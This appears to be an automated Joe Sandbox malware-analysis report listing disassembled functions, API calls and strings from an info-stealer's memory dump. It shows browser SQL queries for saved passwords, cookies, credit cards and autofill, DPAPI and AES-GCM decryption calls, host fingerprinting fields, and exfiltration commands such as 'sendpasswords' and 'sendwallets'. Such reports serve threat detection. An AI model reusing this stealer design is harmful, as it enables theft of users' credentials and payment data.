[DEBUG] Crypt::BCrypt::Init: can't deinitialize cryptoprovider. Last error code: %d , xrefs: 014165C2

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: CryptFile$ErrorLast$AttributesCopyUnothrow_t@std@@@Xtime_get_ticks__ehfuncinfo$??2@omp_get_thread_num$AlgorithmDataDecryptDeleteFolderGenerateOpenPathPropertyProviderSymmetricUnprotect
String ID: Holder: $Month/Year: $; Value: $<AND>count=$<AND>hwid=$<AND>log=$<AND>name=$AES$Card Number: $ChainingMode$ChainingModeGCM$Name: $SELECT name, value FROM autofill$SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards$[DEBUG] Crypt::BCrypt::Init: can't deinitialize cryptoprovider. Last error code: %d $[DEBUG] Crypt::BCrypt::Init: can't initialize cryptoprovider. Last error code: %d $[DEBUG] Crypt::BCrypt::Init: can't set chaining mode. Last error code: %d $\Temp\tmp$application/octet-stream$sendcards$sendfills
API String ID: 3183400236-4253808811
Opcode ID: 1cf3cab2b793cfd6467f2d6d9e4cb88ebe0d99bc507a17b5673b7418ab1bd3c0
Instruction ID: 729d5641c641eaaa63acf727c152d65fe31d68bf55eec1e0acf5de2fa58676a2
Opcode Fuzzy Hash: 1cf3cab2b793cfd6467f2d6d9e4cb88ebe0d99bc507a17b5673b7418ab1bd3c0
Instruction Fuzzy Hash: 672316709002588BEB29CB28CD487EDBB72AFA6314F1482DDD1096B3A6D7759BC4CF51

Function 01418689 Relevance: 58.2, APIs: 14, Strings: 18, Instructions: 2164registrymemoryCOMMON

Download Yara Rule

APIs

RegGetValueW.KERNELBASE(80000002,00000000,DisplayName,0000FFFF,00000000,?,00002000), ref: 014187A0
RegCloseKey.ADVAPI32(00000000,?,00000000,00020019,00000000,940E2C7A), ref: 01418916
GetKeyboardLayout.USER32(00000000), ref: 01418A5C
GetLocaleInfoW.KERNELBASE(?), ref: 01418A66
GetKeyboardLayoutList.USER32(00000000,00000000,?,?,?), ref: 01418B5F
LocalAlloc.KERNEL32(00000040), ref: 01418B6D
GetKeyboardLayoutList.USER32(00000000,00000000), ref: 01418B7B
GetLocaleInfoW.KERNEL32(?,00000002,?,00000200), ref: 01418BD9

Part of subcall function 01422E30: std::locale::_Init.LIBCPMT ref: 01422E88
Part of subcall function 01422E30: std::_Lockit::_Lockit.LIBCPMT ref: 01422EFC
Part of subcall function 01422E30: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 01422F44
Part of subcall function 01422E30: __Getcvt.LIBCPMT ref: 01422F50

LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000034), ref: 01418E7C
AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 01418EDD
CheckTokenMembership.KERNELBASE(00000000,?,?), ref: 01418EFC
FreeSid.ADVAPI32(?), ref: 01418F12
GetSystemMetrics.USER32 ref: 01419180
GetSystemMetrics.USER32(00000001), ref: 01419195

Strings

osinfo, xrefs: 0141A796
&admin=, xrefs: 01419ACD
&langs=, xrefs: 014198B9
DisplayName, xrefs: 01418790
&sizex=, xrefs: 01419C42
&lang=, xrefs: 014197AF
&hwid=, xrefs: 0141969C
&video=, xrefs: 01419EC5
&name=, xrefs: 014199C3
application/x-www-form-urlencoded, xrefs: 0141A76A
&ram=, xrefs: 01419E56
Cores, xrefs: 01419029
True, xrefs: 01419679
| RAM: , xrefs: 01419392
&cpu=, xrefs: 01419B3C
&sizey=, xrefs: 01419D4C
&os=, xrefs: 014196A9
msg, xrefs: 0141A7FF

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: KeyboardLayout$FreeInfoListLocalLocaleMetricsSystemstd::_$AllocAllocateCheckCloseGetcvtInitInitializeLocinfo::_Locinfo_ctorLockitLockit::_MembershipTokenValuestd::locale::_
String ID: Cores$ | RAM: $&admin=$&cpu=$&hwid=$&lang=$&langs=$&name=$&os=$&ram=$&sizex=$&sizey=$&video=$DisplayName$True$application/x-www-form-urlencoded$msg$osinfo
API String ID: 3459785268-2404944243
Opcode ID: 77135a04e57de15ed6bb8e42bcaf1658194f2131c77450cb18546281251833df
Instruction ID: 8187c1c60d700993adcd57cd53735fe35cebedefbe7666407586bbc8effeb436
Opcode Fuzzy Hash: 77135a04e57de15ed6bb8e42bcaf1658194f2131c77450cb18546281251833df
Instruction Fuzzy Hash: F323C1709002A98FEB29CB28CD54BEDBB72AF55304F1481D9D148AB2A5DBB59FC4CF50

Function 01412D70 Relevance: 56.4, APIs: 13, Strings: 18, Instructions: 2161encryptionCOMMON

Download Yara Rule

APIs

__Xtime_get_ticks.LIBCPMT ref: 01412DFF
omp_get_thread_num.VCOMP140(015103FB,00000000), ref: 01412E08
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01412E2E

Part of subcall function 0140FB40: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0140FB71

BCryptOpenAlgorithmProvider.BCRYPT(0152C168,AES,00000000,00000000), ref: 0141350E
GetLastError.KERNEL32 ref: 01413518
BCryptSetProperty.BCRYPT(ChainingMode,ChainingModeGCM,00000020,00000000), ref: 0141353A
GetLastError.KERNEL32 ref: 01413544
BCryptGenerateSymmetricKey.BCRYPT(0152C170,00000000,00000000,?,?,00000000), ref: 01413571
GetLastError.KERNEL32 ref: 0141357B
BCryptDecrypt.BCRYPT ref: 0141365B
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 01413752

Strings

[DEBUG] Crypt::BCrypt::Init: can't set chaining mode. Last error code: %d , xrefs: 0141354B
ChainingModeGCM, xrefs: 0141352A
SELECT host_key, is_httponly, path, is_secure, expires_utc, name, encrypted_value FROM cookies, xrefs: 0141327F
[DEBUG] Crypt::BCrypt::Init: can't initialize cryptoprovider. Last error code: %d , xrefs: 0141351F
application/octet-stream, xrefs: 01414D93
stoll argument out of range, xrefs: 0141500C
ChainingMode, xrefs: 0141352F
sendcookies, xrefs: 01414DBF
AES, xrefs: 01413502
\Temp\tmp, xrefs: 01412E51
<AND>count=, xrefs: 01414AB2
invalid stoll argument, xrefs: 01415016
<AND>hwid=, xrefs: 014149CF
True, xrefs: 01413CA6, 01413D2F
<AND>name=, xrefs: 014149DC
<AND>log=, xrefs: 01414A47
False, xrefs: 01413CAF, 01413D38
[DEBUG] Crypt::BCrypt::Init: can't deinitialize cryptoprovider. Last error code: %d , xrefs: 01413582

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: Crypt$ErrorLast$AlgorithmDataDecryptFolderGenerateOpenPathPropertyProviderSymmetricUnothrow_t@std@@@UnprotectXtime_get_ticks__ehfuncinfo$??2@omp_get_thread_num
String ID: <AND>count=$<AND>hwid=$<AND>log=$<AND>name=$AES$ChainingMode$ChainingModeGCM$False$SELECT host_key, is_httponly, path, is_secure, expires_utc, name, encrypted_value FROM cookies$True$[DEBUG] Crypt::BCrypt::Init: can't deinitialize cryptoprovider. Last error code: %d $[DEBUG] Crypt::BCrypt::Init: can't initialize cryptoprovider. Last error code: %d $[DEBUG] Crypt::BCrypt::Init: can't set chaining mode. Last error code: %d $\Temp\tmp$application/octet-stream$invalid stoll argument$sendcookies$stoll argument out of range
API String ID: 3153028717-66004453
Opcode ID: b9013e074cd61ea58edef302517d0e24885b1bbd8979b871a26cf8c577f0c665
Instruction ID: 703c91acff8fc250d032b56a01ace0c5c7e301aa04c6617d0fccd4397789559b
Opcode Fuzzy Hash: b9013e074cd61ea58edef302517d0e24885b1bbd8979b871a26cf8c577f0c665
Instruction Fuzzy Hash: 401302709002599BEB29CB28CD4C7EDBB72AFA2314F1482DED1086B2A6D7755BC4CF51

Function 01411760 Relevance: 55.6, APIs: 14, Strings: 17, Instructions: 1389fileencryptionCOMMON

Download Yara Rule

APIs

__Xtime_get_ticks.LIBCPMT ref: 014117EF
omp_get_thread_num.VCOMP140(015103FB,00000000), ref: 014117F8
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0141181E

Part of subcall function 0140FB40: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0140FB71

CopyFileA.KERNEL32(?,?,00000000), ref: 01411B71
BCryptOpenAlgorithmProvider.BCRYPT(0152C168,AES,00000000,00000000), ref: 01411CD8
GetLastError.KERNEL32 ref: 01411CE2
BCryptSetProperty.BCRYPT(ChainingMode,ChainingModeGCM,00000020,00000000), ref: 01411D04
GetLastError.KERNEL32 ref: 01411D0E
BCryptGenerateSymmetricKey.BCRYPT(0152C170,00000000,00000000,?,?,00000000), ref: 01411D3B
GetLastError.KERNEL32 ref: 01411D45
BCryptDecrypt.BCRYPT ref: 01411E1F
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 01411E84
SetFileAttributesA.KERNELBASE(?,00000080), ref: 01412C2E
DeleteFileA.KERNELBASE(?), ref: 01412C35

Strings

[DEBUG] Crypt::BCrypt::Init: can't set chaining mode. Last error code: %d , xrefs: 01411D15
Login: , xrefs: 01412142
ChainingModeGCM, xrefs: 01411CF4
[DEBUG] Crypt::BCrypt::Init: can't initialize cryptoprovider. Last error code: %d , xrefs: 01411CE9
application/octet-stream, xrefs: 01412B27
SELECT origin_url, username_value, password_value FROM logins, xrefs: 01411BAB
ChainingMode, xrefs: 01411CF9
AES, xrefs: 01411CCC
\Temp\tmp, xrefs: 01411841
<AND>count=, xrefs: 01412846
Host: , xrefs: 014120E8
<AND>hwid=, xrefs: 01412763
<AND>name=, xrefs: 01412770
<AND>log=, xrefs: 014127DB
sendpasswords, xrefs: 01412B53
Password: , xrefs: 014121B4
[DEBUG] Crypt::BCrypt::Init: can't deinitialize cryptoprovider. Last error code: %d , xrefs: 01411D4C

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: Crypt$ErrorFileLast$AlgorithmAttributesCopyDataDecryptDeleteFolderGenerateOpenPathPropertyProviderSymmetricUnothrow_t@std@@@UnprotectXtime_get_ticks__ehfuncinfo$??2@omp_get_thread_num
String ID: Login: $Password: $<AND>count=$<AND>hwid=$<AND>log=$<AND>name=$AES$ChainingMode$ChainingModeGCM$Host: $SELECT origin_url, username_value, password_value FROM logins$[DEBUG] Crypt::BCrypt::Init: can't deinitialize cryptoprovider. Last error code: %d $[DEBUG] Crypt::BCrypt::Init: can't initialize cryptoprovider. Last error code: %d $[DEBUG] Crypt::BCrypt::Init: can't set chaining mode. Last error code: %d $\Temp\tmp$application/octet-stream$sendpasswords
API String ID: 1794485202-73612781
Opcode ID: 3b249a2bcfce860edf945359d0c19ca5e4ccc16b116929ecb26d489686679039
Instruction ID: c2003c5850a7ab2d3dc095ef70d47004e598e9d483e029ffc111254d63972f61
Opcode Fuzzy Hash: 3b249a2bcfce860edf945359d0c19ca5e4ccc16b116929ecb26d489686679039
Instruction Fuzzy Hash: E3C2F5709002589BEB29CB28CD5CBDDBB72AF65304F2481DDD208AB2A6D7755BC5CF50

Function 01418940 Relevance: 42.9, APIs: 8, Strings: 16, Instructions: 898COMMON

Download Yara Rule

APIs

GetKeyboardLayout.USER32(00000000), ref: 01418A5C
GetLocaleInfoW.KERNELBASE(?), ref: 01418A66

Strings

osinfo, xrefs: 0141A796
&admin=, xrefs: 01419ACD
&langs=, xrefs: 014198B9
&sizex=, xrefs: 01419C42
&lang=, xrefs: 014197AF
&hwid=, xrefs: 0141969C
&video=, xrefs: 01419EC5
&name=, xrefs: 014199C3
application/x-www-form-urlencoded, xrefs: 0141A76A
&ram=, xrefs: 01419E56
Cores, xrefs: 01419029
&cpu=, xrefs: 01419B3C
&sizey=, xrefs: 01419D4C
&os=, xrefs: 014196A9
msg, xrefs: 0141A7FF
False, xrefs: 01419682

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: InfoKeyboardLayoutLocale
String ID: Cores$&admin=$&cpu=$&hwid=$&lang=$&langs=$&name=$&os=$&ram=$&sizex=$&sizey=$&video=$False$application/x-www-form-urlencoded$msg$osinfo
API String ID: 1218629382-1283071188
Opcode ID: 60640908636e533895f8c1120f78f30375837ce4297b36b4c14cd668f6c1398a
Instruction ID: 84f7121b178c284d3a9d4030d356580b84f1b9b6e56a665e6f08f56ce9b13785
Opcode Fuzzy Hash: 60640908636e533895f8c1120f78f30375837ce4297b36b4c14cd668f6c1398a
Instruction Fuzzy Hash: EAB268708042A9CEEB25CF14CD587EEBBB1AF65304F5481D9C1482B292DBB55BC8DFA1

Function 01420CE8 Relevance: 41.6, APIs: 5, Strings: 18, Instructions: 1331sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00124F80,?,00000000,?), ref: 01422553

Part of subcall function 01411550: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,00000000), ref: 01411598
Part of subcall function 01411550: lstrcatA.KERNEL32(00000000,00000000), ref: 014115E5
Part of subcall function 01411550: CreateFileA.KERNELBASE(00000000,80000000,00000000,00000000,00000004,00000000,00000000), ref: 014115FB
Part of subcall function 01411550: GetFileSize.KERNEL32(00000000,00000000), ref: 0141160F
Part of subcall function 01411550: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 01411643
Part of subcall function 01411550: CloseHandle.KERNEL32(00000000), ref: 01411652

GetFileAttributesA.KERNEL32(?), ref: 0142183D
GetFileAttributesA.KERNEL32(?), ref: 01421943
GetFileAttributesA.KERNEL32(?), ref: 01421A49
GetFileAttributesA.KERNEL32(?,00000000,?,?,?,-00000008,?,?,?,00000000,?,?,00000000), ref: 01421B44

Strings

cookies, xrefs: 014218B9
osinfo, xrefs: 01420E90
update, xrefs: 01420DC7
stoi argument out of range, xrefs: 014223A1
browsers:, xrefs: 01421394
defenders, xrefs: 01420F44
updbrows, xrefs: 01420FCF
fills, xrefs: 014219BF
@, xrefs: 01421A32
invalid stoi argument, xrefs: 014223AB
close, xrefs: 01420CF6
logs, xrefs: 01421607
proccesses, xrefs: 014210E3
files, xrefs: 01421208
cards, xrefs: 01421AB7
browsers, xrefs: 0142116F
softwares, xrefs: 01421054
wallets, xrefs: 014212E3

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: File$Attributes$CloseCreateFolderHandlePathReadSizeSleeplstrcat
String ID: @$browsers$browsers:$cards$close$cookies$defenders$files$fills$invalid stoi argument$logs$osinfo$proccesses$softwares$stoi argument out of range$update$updbrows$wallets
API String ID: 2237993004-1686368177
Opcode ID: 5196f6aa19e681393cc306b6db0799d0c583c809f9d98e25c785812973f48b13
Instruction ID: 27a76dc4f09f44d68a402b2c1943cf2019f7b03eb39a60a6f670cac07d3bc033
Opcode Fuzzy Hash: 5196f6aa19e681393cc306b6db0799d0c583c809f9d98e25c785812973f48b13
Instruction Fuzzy Hash: BDC2E5309041698FDF25CF38C8587AEBBB2AF55314FA482DAC49967361D731AAC6CF50

Function 014FB7D0 Relevance: 36.2, APIs: 13, Strings: 7, Instructions: 1206COMMON

Download Yara Rule

APIs

_vcomp_for_static_simple_init.VCOMP140(00000000,?,00000001,00000001,?,?,940E2C7A), ref: 014FB829
GetFileAttributesA.KERNELBASE(?,?,?,940E2C7A), ref: 014FB8AE
_vcomp_for_static_end.VCOMP140(?,?,940E2C7A), ref: 014FB9AA
_vcomp_for_static_simple_init.VCOMP140(00000000,?,00000001,00000001,?,?,940E2C7A,00000000,?), ref: 014FBA59

Strings

<AND>hwid=, xrefs: 014FC0BC
<AND>browser=, xrefs: 014FC0D3
application/octet-stream, xrefs: 014FC5CB
<AND>namefile=, xrefs: 014FC226
<AND>name=, xrefs: 014FC147
sendwallets, xrefs: 014FC5F7
<AND>file=, xrefs: 014FC1B5

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: _vcomp_for_static_simple_init$AttributesFile_vcomp_for_static_end
String ID: <AND>browser=$<AND>file=$<AND>hwid=$<AND>name=$<AND>namefile=$application/octet-stream$sendwallets
API String ID: 1410907095-134213753
Opcode ID: 81abaf4528246cf9b450181bcb2eee2edc170918e8d03928f785c13bbee23778
Instruction ID: 3d8e84b52b0ea256f3d729ad0ff01cf81deaeedda692bef2d47ed77a6847bf01
Opcode Fuzzy Hash: 81abaf4528246cf9b450181bcb2eee2edc170918e8d03928f785c13bbee23778
Instruction Fuzzy Hash: DBB203709002599FEB29CB28CD84BADBBB6EF55314F1481DDE108AB3A1DB359B85CF50

Function 01420BD0 Relevance: 36.0, APIs: 4, Strings: 16, Instructions: 1027
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0, xrefs: 0141FDA6
stoi argument out of range, xrefs: 014223A1
browsers:, xrefs: 01421394
svchost.exe, xrefs: 0142202C
test, xrefs: 0142076A
&hwid=, xrefs: 01420714
&version=, xrefs: 01420727
path, xrefs: 014201E3, 01421E32
application/x-www-form-urlencoded, xrefs: 0142016C, 0142082E, 01421DBE
https, xrefs: 0141FB82
invalid stoi argument, xrefs: 014223AB
GET, xrefs: 01422125
\Temp\, xrefs: 01421EB2
msg, xrefs: 014208B2
getpu, xrefs: 01420198, 01421DEA
connect, xrefs: 0142085A

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID:
String ID: &hwid=$&version=$0$GET$\Temp\$application/x-www-form-urlencoded$browsers:$connect$getpu$https$invalid stoi argument$msg$path$stoi argument out of range$svchost.exe$test
API String ID: 0-4002825708
Opcode ID: ed7e26c1efc7e022290f95ace033abdfd4ad061cf8df871dba618c5e55b4a9d8
Instruction ID: 4227c855b27ef1bcfa28c422c28fe967dd41d92660cfea544afa11f473e05a16
Opcode Fuzzy Hash: ed7e26c1efc7e022290f95ace033abdfd4ad061cf8df871dba618c5e55b4a9d8
Instruction Fuzzy Hash: 1492F570D002298FEB24DF68CC58BADBBB1BF65314F64819ED049A72A1DB749AC4CF51

Function 014175D0 Relevance: 20.3, APIs: 8, Strings: 3, Instructions: 1066registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020019,00000000,940E2C7A,00000000), ref: 01417653
RegEnumKeyW.ADVAPI32(00000000,00000000,?,0000020A), ref: 01417693
RegGetValueW.KERNELBASE(80000002,00000000,01510418,0000FFFF,00000000,?,00002000), ref: 014177D5

Strings

\shell\open\command, xrefs: 01417852
list too long, xrefs: 014185CF
| ver. , xrefs: 01418211

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: EnumOpenValue
String ID: | ver. $\shell\open\command$list too long
API String ID: 2571532894-685068868
Opcode ID: fcefa3e19a738fe6afa4c5755c72c113eaa202b3339cd115ecc9fb92c746bc40
Instruction ID: 00c5961e28a352048db43000f7918279dcb553d93178207ef2ec8813766a184f
Opcode Fuzzy Hash: fcefa3e19a738fe6afa4c5755c72c113eaa202b3339cd115ecc9fb92c746bc40
Instruction Fuzzy Hash: A8A2D170D042598FEB25CB28CD447ADBBB5EF95314F0482D9D40CA72A5DB79AAC4CF90

Function 01410810 Relevance: 17.9, APIs: 7, Strings: 3, Instructions: 435
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindNextFileW.KERNELBASE(?,00000010), ref: 01410C36
FindClose.KERNEL32(00000000,?,?,?,?,940E2C7A), ref: 01410C45
FindFirstFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,940E2C7A), ref: 01410CB8
lstrcmpW.KERNEL32(?,0151266C,?,?,?,?,?,?,?,?,?,?,?,940E2C7A), ref: 01410CF9
lstrcmpW.KERNEL32(?,01512674,?,?,?,?,?,?,?,?,?,?,?,940E2C7A), ref: 01410D0F
FindNextFileW.KERNEL32(?,00000010,?,?,?,?,?,?,?,?,?,?,?,940E2C7A), ref: 01410E8D
FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,940E2C7A), ref: 01410EA2

Part of subcall function 014C349C: std::invalid_argument::invalid_argument.LIBCONCRT ref: 014C34A8

Strings

%s\%s, xrefs: 01410DB5
list too long, xrefs: 01410ECE
%s\*, xrefs: 01410C61

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: Find$File$CloseNextlstrcmp$Firststd::invalid_argument::invalid_argument
String ID: %s\%s$%s\*$list too long
API String ID: 2135687296-1613067349
Opcode ID: 9da44555ca3414c135cfbc68b0579ab9c28f4b95ac87bb558a7fe29789e7cbaf
Instruction ID: 8b8b50d1b064a4e9c5167efef7fe4c7cd5d575d5a8e9633dad953f3d1f384d15
Opcode Fuzzy Hash: 9da44555ca3414c135cfbc68b0579ab9c28f4b95ac87bb558a7fe29789e7cbaf
Instruction Fuzzy Hash: 9402C1719001198BDB28CB28CD98BEEBB75BF61314F1482DAE509A72A5DB359FC4CF50

Function 01410730 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 200
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(00000000,?,?,?,?,?,940E2C7A), ref: 014107F0

Strings

%s\%s, xrefs: 01410DB5
%s\*, xrefs: 01410797, 01410C61

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: FileFindFirst
String ID: %s\%s$%s\*
API String ID: 1974802433-2848263008
Opcode ID: 19e2232795e83e980749b2ebf9dcbec04947bf03f1e8c760f51dc1aef952a200
Instruction ID: a628b7a65fe734b157aaf932c79e35ce0468c1909c211930a5448113d031692f
Opcode Fuzzy Hash: 19e2232795e83e980749b2ebf9dcbec04947bf03f1e8c760f51dc1aef952a200
Instruction Fuzzy Hash: 4D71C8B19011199BDB25DB59DC44FEAB7B8FF14300F0442EAE909A7194EB305F89CFA4

Function 01447C60 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 421COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01447F32
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014480F3

Strings

f66f7a17b78ba617acde90fc810107f34f1a1f2e, xrefs: 01447DC4
cannot open file at line %d of [%.10s], xrefs: 01447DCE

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: cannot open file at line %d of [%.10s]$f66f7a17b78ba617acde90fc810107f34f1a1f2e
API String ID: 885266447-2115094429
Opcode ID: e2f71c2af6a8decdc54985471231b6bcf7a21f8a39cc9a6002735fce4bfecfa8
Instruction ID: 8d3b22d148c8d8f2b0b5966b3c663a73b420d16f9fcb91b5871feddb3c95fc13
Opcode Fuzzy Hash: e2f71c2af6a8decdc54985471231b6bcf7a21f8a39cc9a6002735fce4bfecfa8
Instruction Fuzzy Hash: ADF1CDB0A047429FF725CF68C840B6BB7E1BF84215F044A1EE9589B3A1D7B4E946C7D2

Function 014D83FF Relevance: 3.0, APIs: 2, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoEx.KERNELBASE(?,?,014D8116,?,00000022,00000000,00000002,?,?,014CE822,00000004,014C94B7,?,00000004,014CA650,00000000), ref: 014D8421
GetLocaleInfoW.KERNEL32(00000000,?,?,?,?,?,014D8116,?,00000022,00000000,00000002,?,?,014CE822,00000004,014C94B7), ref: 014D842C

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 205c0ac92e681791dd48c3f358666271e2209a237ab0e43d7fa6066340d6fa05
Instruction ID: b9f62cdab04b49d9f5d4bbfb349159590724f33c490f06a53d766d152a07d139
Opcode Fuzzy Hash: 205c0ac92e681791dd48c3f358666271e2209a237ab0e43d7fa6066340d6fa05
Instruction Fuzzy Hash: 02E01D32541129AFCF125FD5FC148BE7F29FF047617050019F9155A224DF725810EBD1

Function 014113C0 Relevance: 1.6, APIs: 1, Instructions: 149encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 014114C2

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: c65f12b8129b6f732494f0f2874202d95871b0ef6ce712eb589a8688af90f47c
Instruction ID: 944e19eb33cd739e5cbc4734269420be81e69f483552aff04e48630f7b4c778f
Opcode Fuzzy Hash: c65f12b8129b6f732494f0f2874202d95871b0ef6ce712eb589a8688af90f47c
Instruction Fuzzy Hash: 794167B5E002598FDB218F7D98417FFBFE8EF56A00F48006EDA869B319D2356405C7A1

Function 014BA640 Relevance: 38.7, APIs: 3, Strings: 19, Instructions: 237
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysFreeString.OLEAUT32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,\\.\root\,00000000,940E2C7A,00000000,00000000,?), ref: 014BA6DF
SysFreeString.OLEAUT32(00000000), ref: 014BA7A0

Part of subcall function 014DA47E: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,014C34BB,?,01524438,?), ref: 014DA4DE

Strings

Error initializing IWbemServices: WBEM_E_TRANSPORT_FAILURE, xrefs: 014BA857
Error executing query: WBEM_E_INVALID_PARAMETER, xrefs: 014BAB60
Error initializing IWbemServices: WBEM_E_ACCESS_DENIED, xrefs: 014BA929
Coult not set proxy blanket: Unknown Error, xrefs: 014BA8CA
Error initializing IWbemServices: WBEM_E_INVALID_PARAMETER, xrefs: 014BA825
Error executing query: WBEM_E_TRANSPORT_FAILURE, xrefs: 014BABA8
Error executing query: WBEM_E_INVALID_CLASS, xrefs: 014BAB47
Error executing query: WBEM_E_ACCESS_DENIED, xrefs: 014BAC08
Error initializing IWbemServices: Unknown Error, xrefs: 014BA889
\\.\root\, xrefs: 014BA687
NULL, xrefs: 014BAF54
Coult not set proxy blanket: E_INVALIDARG, xrefs: 014BA8F2
Error executing query: WBEM_E_FAILED, xrefs: 014BAB2E
Error executing query: WBEM_E_SHUTTING_DOWN, xrefs: 014BAB92
Error executing query: WBEM_E_OUT_OF_MEMORY, xrefs: 014BAB79
Error initializing IWbemServices: WBEM_E_LOCAL_CREDENTIALS, xrefs: 014BA870
Error initializing IWbemServices: WBEM_E_FAILED, xrefs: 014BA7F3
Error initializing IWbemServices: WBEM_E_OUT_OF_MEMORY, xrefs: 014BA83E
Error initializing IWbemServices: WBEM_E_INVALID_NAMESPACE, xrefs: 014BA80C

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: FreeString$ExceptionRaise
